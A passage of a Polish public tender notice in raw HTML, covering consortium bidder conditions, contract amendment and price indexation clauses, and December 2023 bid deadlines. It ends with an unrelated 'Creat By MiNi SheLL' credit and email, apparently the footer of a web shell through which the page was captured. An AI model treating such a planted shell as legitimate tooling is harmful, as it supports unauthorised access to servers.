wspólnie o udzielenie zamówienie brak podstaw<br/>do wykluczenia z postępowania powinien wykazać każdy z wykonawców.<br/>4. Wspólników spółki cywilnej obowiązują przepisy dotyczące wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, o których mowa w art. 58 ustawy PZP.<br/>5. Zgodnie z art. 117 ust. 1 PZP zamawiający określa szczególny, obiektywnie uzasadniony,<br/>sposób spełniania przez wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>określonego w niniejszej SWZ warunków udziału w postępowaniu, mając<br/>na uwadze, że jest to uzasadnione charakterem zamówienia i jest proporcjonalne tzn.:<br/>1) Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 ustawy PZP, jest spełniony, jeżeli co najmniej<br/>jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia<br/>do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty<br/>budowlane, dostawy lub usługi,<br/>do których realizacji te uprawnienia są wymagane;<br/>2) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane;<br/>3) W przypadku, o którym mowa w pkt 5 ppkt 1) i 2), wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają o do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi, wykonają poszczególni wykonawcy;<br/>4) Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia<br/>publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Oprócz przesłanek wymienionych w art. 455 PZP zamawiający przewiduje:<br/>1) Wszystkie wartości netto określone przez wykonawcę są ustalone na okres obowiązywania<br/>umowy.<br/>2) Urzędowa zmiana stawek podatku VAT obowiązuje z mocy prawa.<br/>Wynagrodzenie nie podlega waloryzacji przez okres 12 miesięcy. W przypadku przedłużenia<br/>umowy wynagrodzenie wykonawcy, o którym mowa w Załączniku nr 7, może podlegać<br/>waloryzacji w trakcie obowiązywania umowy w przypadku:<br/>a) zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki<br/>godzinowej ustalonych na podstawie przepisów ustawy z dnia 10 października 2002r. o<br/>minimalnym wynagrodzeniu za pracę (tj. Dz.U. z 2020r. poz. 2207);<br/>b) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub<br/>wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne;<br/>c) zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o<br/>których mowa w ustawie z dnia 4 października 2018r. o pracowniczych planach kapitałowych (t.j.<br/>Dz.U. z 2020r. poz. 1342 ze zm.);<br/>d) zmiany stawki podatku od towarów i usług oraz podatku akcyzowego; - jeżeli zmiany<br/>wymienione wyżej będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.<br/>Waloryzacja nastąpi na pisemny wniosek wykonawcy skierowany do zamawiającego wraz z<br/>uzasadnieniem oraz szczegółowym wyliczeniem wpływu zmiany na ponoszone przez<br/>wykonawcę koszty wykonania zamówienia. Wniosek należy złożyć w maksymalnym terminie 30<br/>dni od dnia wejścia w życie zmian przepisów. W przypadku sporu o zasadność wprowadzenia waloryzacji może 23 zostać wprowadzona waloryzacja sądowa w myśl art. 3571 K.c.. Zmiana<br/>wysokości wynagrodzenia obowiązywać będzie od dnia zawarcia aneksu w tym zakresie.<br/>2. Zamawiający dopuszcza zmianę umowy w formie aneksu, jeżeli zmiany będą konieczne<br/>i korzystne dla zamawiającego. Za zmiany korzystne należy uznać wszelkiego rodzaju nowe<br/>postanowienia, które wzmacniają pozycję zamawiającego jako wierzyciela z tytułu świadczenia<br/>niepieniężnego (np. wydłużenie okresu rękojmi, skrócenie terminu wykonania zamówienia,<br/>obniżenie ceny, podwyższenie kar umownych), oraz te zmiany, które prowadzą do wzmocnienia<br/>jego pozycji jako dłużnika z tytułu świadczenia pieniężnego (np. wydłużenie terminu zapłaty).<br/>3. Zamawiający dopuszcza w formie aneksu zmiany umowy w zakresie ochrony danych<br/>osobowych na podstawie rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679<br/>RODO (Dz. U. UE. L 119 z 04.05.2016 s. 1) .<br/>4. W przypadku przedłużenia umowy:<br/>1) poziom zmiany ceny kosztów uprawniający strony umowy do żądania zmiany wynagrodzenia<br/>ustala się w następujący sposób: materiały lub koszty wykonania usługi muszą wzrosnąć lub<br/>obniżyć się o 10% w skali 3 miesięcy;<br/>2) początkowy termin ustalenia zmiany wynagrodzenia to data zawarcia umowy lub jeżeli<br/>umowa została zawarta po upływie 180 dni od dnia upływu terminu składania ofert,<br/>początkowym terminem ustalenia zmiany wynagrodzenia jest dzień otwarcia ofert; 3) zmiana<br/>wynagrodzenia dokonana zostanie w następujący sposób:<br/>a) przez wskazanie podstawy, w szczególności wykazu rodzajów materiałów lub kosztów, w<br/>przypadku których zmiana ceny uprawnia strony umowy do żądania zmiany wynagrodzenia;<br/>b) przez określenie procentowego wpływu zmiany ceny materiałów lub kosztów na koszt<br/>wykonania zamówienia<br/>c) zmiana wynagrodzenia Wykonawcy może nastąpić po przedstawieniu Zamawiającemu<br/>szczegółowego procentowego wpływu zmiany ceny materiałów lub kosztów na koszt wykonania<br/>zamówienia i nie może nastąpić wcześniej niż 24 przed upływem 3 miesięcy od daty zawarcia<br/>umowy lub jeżeli umowa została zawarta po upływie 180 dni od terminu składania ofert po<br/>upływie 3 miesięcy od dnia otwarcia ofert; 4) maksymalna wartości zmiany wynagrodzenia, jaką<br/>dopuszcza Zamawiający w efekcie zastosowania postanowień o zasadach wprowadzania zmian<br/>wysokości wynagrodzenia wynosi 5% ceny ofertowej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-15 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy zakupowej „openNexus”</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-15 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-13</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com